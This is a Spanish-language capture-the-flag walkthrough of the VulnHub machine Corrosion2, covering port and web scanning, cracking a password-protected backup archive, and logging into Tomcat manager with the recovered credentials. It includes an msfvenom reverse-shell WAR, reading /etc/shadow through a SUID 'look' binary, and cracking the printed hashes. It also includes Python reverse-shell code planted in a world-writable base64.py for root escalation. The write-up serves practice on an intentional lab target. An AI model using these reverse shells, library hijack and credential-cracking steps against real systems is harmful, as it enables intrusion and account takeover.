Corrosion2 VulnHub
Escaneo de puertos
nmap -p- --open -sS --min-rate 5000 -vvv -n -Pn <IP>nmap -sCV -p<PORTS> <IP>Info:
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-06-09 06:41 EDT
Nmap scan report for 192.168.5.176
Host is up (0.00034s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 6a:d8:44:60:80:39:7e:f0:2d:08:2f:e5:83:63:f0:70 (RSA)
| 256 f2:a6:62:d7:e7:6a:94:be:7b:6b:a5:12:69:2e:fe:d7 (ECDSA)
|_ 256 28:e1:0d:04:80:19:be:44:a6:48:73:aa:e8:6a:65:44 (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
8080/tcp open http Apache Tomcat 9.0.53
|_http-title: Apache Tomcat/9.0.53
|_http-favicon: Apache Tomcat
MAC Address: 00:0C:29:AA:39:7A (VMware)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.01 secondsGobuster
gobuster dir -u http://<IP>:8080/ -w <WORDLIST> -x html,php,txt -t 50 -k -rInfo:
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.5.176:8080/
[+] Method: GET
[+] Threads: 50
[+] Wordlist: /usr/share/wordlists/dirb/big.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Extensions: html,php,txt
[+] Follow Redirect: true
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/[.txt (Status: 400) [Size: 762]
/[ (Status: 400) [Size: 762]
/[.html (Status: 400) [Size: 762]
/] (Status: 400) [Size: 762]
/].txt (Status: 400) [Size: 762]
/].php (Status: 400) [Size: 762]
/].html (Status: 400) [Size: 762]
/[.php (Status: 400) [Size: 762]
/docs (Status: 200) [Size: 14906]
/examples (Status: 200) [Size: 1126]
/favicon.ico (Status: 200) [Size: 21630]
/plain].php (Status: 400) [Size: 762]
/plain].html (Status: 400) [Size: 762]
/plain] (Status: 400) [Size: 762]
/plain].txt (Status: 400) [Size: 762]
/quote].html (Status: 400) [Size: 762]
/quote] (Status: 400) [Size: 762]
/quote].php (Status: 400) [Size: 762]
/quote].txt (Status: 400) [Size: 762]
/readme.txt (Status: 200) [Size: 153]
Progress: 81876 / 81880 (100.00%)
/manager (Status: 401) [Size: 2499]
===============================================================
Finished
===============================================================Vemos que hay un /readme.txt y si vemos su contenido veremos lo siguiente...
Hey randy! It's your System Administrator. I left you a file on the server, I'm sure nobody will find it.
Also remember to use that password I gave you.Vemos que nos da una pista de un usuario llamado randy que es administrador y por alguna parte de la pagina o de algun sitio estan las credenciales de la misma...
Nikto
nikto -h http://<IP>:8080Info:
- Nikto v2.5.0
---------------------------------------------------------------------------
+ Target IP: 192.168.5.176
+ Target Hostname: 192.168.5.176
+ Target Port: 8080
+ Start Time: 2024-06-09 09:33:25 (GMT-4)
---------------------------------------------------------------------------
+ Server: No banner retrieved
+ /: The anti-clickjacking X-Frame-Options header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options
+ /: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ /backup.zip: Potentially interesting backup/cert file found. . See: https://cwe.mitre.org/data/definitions/530.html
+ /favicon.ico: identifies this app/server as: Apache Tomcat (possibly 5.5.26 through 8.0.15), Alfresco Community. See: https://en.wikipedia.org/wiki/Favicon
+ OPTIONS: Allowed HTTP Methods: GET, HEAD, POST, PUT, DELETE, OPTIONS .
+ HTTP method ('Allow' Header): 'PUT' method could allow clients to save files on the web server.
+ HTTP method ('Allow' Header): 'DELETE' may allow clients to remove files on the web server.
+ /examples/servlets/index.html: Apache Tomcat default JSP pages present.
+ /examples/jsp/snp/snoop.jsp: Displays information about page retrievals, including other users. See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2104
+ /readme.txt: This might be interesting.
+ /manager/html: Default Tomcat Manager / Host Manager interface found.
+ /host-manager/html: Default Tomcat Manager / Host Manager interface found.
+ /manager/status: Default Tomcat Server Status interface found.
+ /host-manager/status: Default Tomcat Server Status interface found.
+ 8253 requests: 0 error(s) and 14 item(s) reported on remote host
+ End Time: 2024-06-09 09:33:44 (GMT-4) (19 seconds)
---------------------------------------------------------------------------
+ 1 host(s) testedPor lo que vemos nos descubre varias cosas, entre ellas un panel de login /manager/html y un archivo .zip bastante interesante, por lo que nos descargaremos ese archivo .zip y veremos su contenido...
URL = http://<IP>:8080/backup.zipSi intentamos descomprimirlo con unzip veremos que tiene contraseña, por lo que haremos lo siguiente...
zip2john backup.zip > hashInfo:
ver 2.0 efh 5455 efh 7875 backup.zip/catalina.policy PKZIP Encr: TS_chk, cmplen=2911, decmplen=13052, crc=AD0C6FDB ts=6920 cs=6920 type=8
ver 2.0 efh 5455 efh 7875 backup.zip/context.xml PKZIP Encr: TS_chk, cmplen=721, decmplen=1400, crc=59B9F4E7 ts=6920 cs=6920 type=8
ver 2.0 efh 5455 efh 7875 backup.zip/catalina.properties PKZIP Encr: TS_chk, cmplen=2210, decmplen=7276, crc=1CD3C095 ts=6920 cs=6920 type=8
ver 2.0 efh 5455 efh 7875 backup.zip/jaspic-providers.xml PKZIP Encr: TS_chk, cmplen=626, decmplen=1149, crc=748A87A6 ts=6920 cs=6920 type=8
ver 2.0 efh 5455 efh 7875 backup.zip/jaspic-providers.xsd PKZIP Encr: TS_chk, cmplen=862, decmplen=2313, crc=3B44D150 ts=6920 cs=6920 type=8
ver 2.0 efh 5455 efh 7875 backup.zip/logging.properties PKZIP Encr: TS_chk, cmplen=1076, decmplen=4144, crc=1D6C26F7 ts=6920 cs=6920 type=8
ver 2.0 efh 5455 efh 7875 backup.zip/server.xml PKZIP Encr: TS_chk, cmplen=2609, decmplen=7589, crc=F91AC0C0 ts=6920 cs=6920 type=8
ver 2.0 efh 5455 efh 7875 backup.zip/tomcat-users.xml PKZIP Encr: TS_chk, cmplen=1167, decmplen=2972, crc=BDCB08B9 ts=B0E3 cs=b0e3 type=8
ver 2.0 efh 5455 efh 7875 backup.zip/tomcat-users.xsd PKZIP Encr: TS_chk, cmplen=858, decmplen=2558, crc=E8F588C2 ts=6920 cs=6920 type=8
ver 2.0 efh 5455 efh 7875 backup.zip/web.xml PKZIP Encr: TS_chk, cmplen=18917, decmplen=172359, crc=B8AF6070 ts=6920 cs=6920 type=8
NOTE: It is assumed that all files in each archive have the same password.
If that is not the case, the hash may be uncrackable. To avoid this, use
option -o to pick a file at a time.Se nos generara un archivo hash codificado, por lo que lo tendremos que crackear...
Contenido del hash
backup.zip:$pkzip$8*1*1*0*8*24*6920*948f83df8e3188341e0c4ced81b85ffe507a30f1c8bb3d60d228d81ba45b3044c40d51f4*1*0*8*24*6920*6af6b41285729172215c7a912286e6312228c5142b6e537384c0ad6b9a6e40b2de98422e*1*0*8*24*6920*d042ed9f0787c684de489fd42ddd00403556c0caaeeabff6ca78e998731732959a1a7adf*1*0*8*24*6920*034f00f26675d81f70f7de491b1c645f15032c9ab52aa2c6157156996a72a9a6a138c8e6*1*0*8*24*b0e3*9f16689c61f4dc5fb5405d409a9c4814354c0dba919313e1903a9580daa135342c46fea3*1*0*8*24*6920*7046a2cc2a19fdf9e44c52bdd3b1a9d458ca7e751d2ec883c4d808c79087fb2606344d59*1*0*8*24*6920*6ae99725253d7986459879f818798e0fe14dd1a533635704c24831f0acbceab71f99b284*2*0*272*47d*748a87a6*17dd*4e*8*272*6920*502768ce9a11db8105560cdc8ea3b12cb91e5fa10d15b79fdc5335826c2f4a6e4112818ff5cce6e766548eef59eafabd29a2c2de3308487c980603b3867bb62bb60e65451a1fd9bb068ff01a4c2e98a8bbb56dd0f392338b147324bbd34ab2e63d2b80882029705f3803ead22980591ea52cab28fad58ad94838283fd7e267478f9a3e7f645f60ca4d0a227cef99c3db46184f8521dc4dd30f4102ad006dd04a7d054a9018f55730511ccd34bd15a50ebbd1012d4ba320b23fa925ede6d62e3929c137b959813290f0bf0e2a9ca075d1b6b511fb525a5289c32d29365132e25432f855f982f37e4a5fde6901e8f889218d987067920133a4b26ceecc5f3d28f40cb33601cff6f803b0eb900a183ef9e13d7e888fc9770fdb9d01ced0c6969f5df03fdce418da1d979220b430bee9dc21fa63f33b2c1f7b99f848ca5b618d0b6d6eb56ec3748595f1ca1c01492d6464fd1cf73ecd92b6bea1bccc9b8795b1d6087e9205b8e6c5122f83e3625c145b563e1763578d002e0feea455a19d74831c64f69440a3cbcb7b679f683c238984873b7a80df997f11e5d924fe98d1baef30bfce5efb613e82eab136e3844b0e326508b1dac80b2f863b35efdbfa95138d9994699da813c8bb8bc4e7c885b851db53f85d8f1d39f32dfda36477a64821ea03e444866882c6b64d446feb650780e26fab3701fd0743ac26cacefde996ccfe538776ea101c1d3aec81660613bd65eb34569139ee0845e7f7d1e8b12f8ed43ef58e9580c58ab2cfe170981c72256b4b12cc152771546d0ea9077d368c3ddc2c63819b00b3dd3581ab8908561cd8ad722c21d9a891922d8b52444f4fca9278a1a96e926cf19125ec20a327e8a3ab0aa2b05d4348*$/pkzip$::backup.zip:jaspic-providers.xml, context.xml, tomcat-users.xsd, jaspic-providers.xsd, logging.properties, tomcat-users.xml, catalina.properties, server.xml:backup.zipjohn --wordlist=<WORDLIST> hashInfo:
Using default input encoding: UTF-8
Loaded 1 password hash (PKZIP [32/64])
Will run 8 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
@administrator_hi5 (backup.zip)
1g 0:00:00:00 DONE (2024-06-09 09:42) 1.030g/s 11857Kp/s 11857Kc/s 11857KC/s @lexutz..9StephiOlarte
Use the "--show" option to display all of the cracked passwords reliably
Session completed.Nos saca la password para descomprimir el .zip...
unzip backup.zipY cuando metemos la password llamada @administrator_hi5 nos descomprimira todo el contenido...
Si leemos el archivo llamado tomcat-users.xml veremos lo siguiente bastante interesante...
<role rolename="manager-gui"/>
<user username="manager" password="melehifokivai" roles="manager-gui"/>
<role rolename="admin-gui"/>
<user username="admin" password="melehifokivai" roles="admin-gui, manager-gui"/>
</tomcat-users>Por lo que si nos vamos a la URL...
URL = http://<IP>:8080/manager/htmlNos saltara un panel de login y si metemos las credenciales que hemos descubierto de manager nos logeara como administradores...
Credentials
User = manager
Password = melehifokivaiUna vez dentro haremos una Reverse Shell de la siguiente manera...
Desde nuestro host creamos un archivo malicioso con el formato que admite tomcat .war para luego subirlo y ejecutarlo...
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f war -o reverse.warUna vez creado este archivo lo subimos desde el panel del tomcat y lo ejecutamos entrando dentro del mismo estando a la escucha...
nc -lvnp <PORT>Hecho esto estariamos dentro con una shell rara, por lo que la sanitizamos...
/bin/bashscript /dev/null -c bash# <Ctrl> + <z>
stty raw -echo; fg
reset xterm
export TERM=xterm
# Para ver las dimensiones de nuestra consola en el Host
stty size
# Para redimensionar la consola ajustando los parametros adecuados
stty rows <ROWS> columns <COLUMNS>Si nos vamos a la /home de randy veremos la primera flag...
user.txt (flag1)
ca73a018ae6908a7d0ea5d1c269ba4b6Vemos que hay un note.txt que contiene lo siguiente...
Hey randy this is your system administrator, hope your having a great day! I just wanted to let you know
that I changed your permissions for your home directory. You won't be able to remove or add files for now.
I will change these permissions later on.
See you next Monday randy!Si probamos a reutilizar la contraseña con el usuario jaye nos cambiaremos a ese usuario, por lo que...
User = jaye
Password = melehifokivaiSi hacemos lo siguiente...
find / -type f -perm -4000 -ls 2>/dev/nullVeremos una linea interesante...
264044 16 ---s--s--x 1 root root 14728 Sep 17 2021 /home/jaye/Files/lookY si vamos a GTFOBins veremos que se puede explotar pudiendo leer cualquier archivo...
URL = https://gtfobins.github.io/gtfobins/look/
Por lo que podremos leer la flag de root...
LFILE=/root/root.txt
./look '' "$LFILE"root.txt (flag2)
2fdbf8d4f894292361d6c72c8e833a4bPero si queremos ser root haremos lo siguiente...
Miraremos el /etc/shadow...
LFILE=/etc/shadow
./look '' "$LFILE"Info:
root:$6$fHvHhNo5DWsYxgt0$.3upyGTbu9RjpoCkHfW.1F9mq5dxjwcqeZl0KnwEr0vXXzi7Tld2lAeYeIio/9BFPjUCyaBeLgVH1yK.5OR57.:18888:0:99999:7:::
daemon:*:18858:0:99999:7:::
bin:*:18858:0:99999:7:::
sys:*:18858:0:99999:7:::
sync:*:18858:0:99999:7:::
games:*:18858:0:99999:7:::
man:*:18858:0:99999:7:::
lp:*:18858:0:99999:7:::
mail:*:18858:0:99999:7:::
news:*:18858:0:99999:7:::
uucp:*:18858:0:99999:7:::
proxy:*:18858:0:99999:7:::
backup:*:18858:0:99999:7:::
list:*:18858:0:99999:7:::
irc:*:18858:0:99999:7:::
gnats:*:18858:0:99999:7:::
nobody:*:18858:0:99999:7:::
systemd-network:*:18858:0:99999:7:::
systemd-resolve:*:18858:0:99999:7:::
systemd-timesync:*:18858:0:99999:7:::
messagebus:*:18858:0:99999:7:::
syslog:*:18858:0:99999:7:::
_apt:*:18858:0:99999:7:::
tss:*:18858:0:99999:7:::
uuidd:*:18858:0:99999:7:::
tcpdump:*:18858:0:99999:7:::
avahi-autoipd:*:18858:0:99999:7:::
usbmux:*:18858:0:99999:7:::
rtkit:*:18858:0:99999:7:::
dnsmasq:*:18858:0:99999:7:::
cups-pk-helper:*:18858:0:99999:7:::
speech-dispatcher:!:18858:0:99999:7:::
avahi:*:18858:0:99999:7:::
kernoops:*:18858:0:99999:7:::
saned:*:18858:0:99999:7:::
nm-openvpn:*:18858:0:99999:7:::
hplip:*:18858:0:99999:7:::
whoopsie:*:18858:0:99999:7:::
colord:*:18858:0:99999:7:::
geoclue:*:18858:0:99999:7:::
pulse:*:18858:0:99999:7:::
gnome-initial-setup:*:18858:0:99999:7:::
gdm:*:18858:0:99999:7:::
sssd:*:18858:0:99999:7:::
randy:$6$bQ8rY/73PoUA4lFX$i/aKxdkuh5hF8D78k50BZ4eInDWklwQgmmpakv/gsuzTodngjB340R1wXQ8qWhY2cyMwi.61HJ36qXGvFHJGY/:18888:0:99999:7:::
systemd-coredump:!!:18886::::::
tomcat:$6$XD2Bs.tL01.5OT2b$.uXUR3ysfujHGaz1YKj1l9XUOMhHcKDPXYLTexsWbDWqIO9ML40CQZPI04ebbYzVNBFmgv3Mpd3.8znPfrBNC1:18888:0:99999:7:::
sshd:*:18887:0:99999:7:::
jaye:$6$Chqrqtd4U/B1J3gV$YjeAWKM.usyi/JxpfwYA6ybW/szqkiI1kerC4/JJNMpDUYKavQbnZeUh4WL/fB/4vrzX0LvKVWu60dq4SOQZB0:18887:0:99999:7:::Y cogeremos la password de randy para crackearla con el john...
john --wordlist=<WORDLIST> <HASH_FILE>Info:
Using default input encoding: UTF-8
Loaded 1 password hash (sha512crypt, crypt(3) $6$ [SHA512 128/128 AVX 2x])
Cost 1 (iteration count) is 5000 for all loaded hashes
Will run 8 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
07051986randy (randy)
1g 0:00:48:57 DONE (2024-06-09 13:28) 0.000340g/s 4742p/s 4742c/s 4742C/s 070552898..070488m
Use the "--show" option to display all of the cracked passwords reliably
Session completed.Por lo que vemos obtuvimos las credenciales...
User = randy
Password = 07051986randyssh randy@<IP>Hecho esto ya estaremos dentro con el usuario randy, por lo que si hacemos sudo -l veremos lo siguiente...
Matching Defaults entries for randy on corrosion:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User randy may run the following commands on corrosion:
(root) PASSWD: /usr/bin/python3.8 /home/randy/randombase64.pySi leemos lo que hace ese script...
import base64
message = input("Enter your string: ")
message_bytes = message.encode('ascii')
base64_bytes = base64.b64encode(message_bytes)
base64_message = base64_bytes.decode('ascii')
print(base64_message)Vemos que codifica lo que le pongas a Base64, pero tambien vemos que importa un Base64 que parece sospechoso...
find / -name 'base64.py' 2>/dev/nullInfo:
/snap/core18/2128/usr/lib/python3.6/base64.py
/snap/core18/2823/usr/lib/python3.6/base64.py
/snap/gnome-3-34-1804/93/usr/lib/python2.7/base64.py
/snap/gnome-3-34-1804/93/usr/lib/python3.6/base64.py
/snap/gnome-3-34-1804/72/usr/lib/python2.7/base64.py
/snap/gnome-3-34-1804/72/usr/lib/python3.6/base64.py
/usr/lib/python3.8/base64.pyVemos la siguiente linea muy sospechosa...
/usr/lib/python3.8/base64.pySi leemos los permisos que tiene...
-rwxrwxrwx 1 root root 689 Jun 9 10:53 /usr/lib/python3.8/base64.pyVemos que podemos editarlo, por lo que si editamos esto con una Reverse Shell y al ejecutarlo como root importara este .py y nos creara la Reverse Shell por lo que borramos el contenido de ese .py...
Vamos a crear un archivo que borre su interior...
nano rm.py
#Contenido del nano
with open('/usr/lib/python3.8/base64.py', 'w') as f:
f.write('')chmod +x rm.pypython3 /tmp/rm.pyUna vez hecho esto ya estara vacio, por lo que ponemos una Reverse Shell...
nano /usr/lib/python3.8/base64.py
#Contenido del nano
import socket
import subprocess
# Definir la dirección IP y el puerto del atacante
HOST = '<IP>'
PORT = <PORT>
# Crear un socket TCP/IP
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# Conectar el socket al servidor
s.connect((HOST, PORT))
# Bucle para recibir comandos y enviar resultados
while True:
# Recibir el comando del servidor
command = s.recv(1024)
# Ejecutar el comando y capturar la salida
output = subprocess.Popen(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
result = output.stdout.read() + output.stderr.read()
# Enviar el resultado al servidor
s.send(result)
# Cerrar la conexión
s.close()Una vez hecho esto, haremos lo siguiente...
Estaremos a la escucha antes...
nc -lvnp <PORT>Despues lo ejecutamos...
sudo /usr/bin/python3.8 /home/randy/randombase64.pyY nos habria creado una shell un poco mala pero autenticados como root por lo que dentro de esa shell para mejorarla haremos lo siguiente...
chmod u+s /bin/bashY si nos salimos de esa shell y volvemos a nuestro usuario randy hacemos lo siguiente ya que otorgamos con root SUID a la bash...
bash -pY ya seriamos root, por lo que podremos leer la flag...
Last updated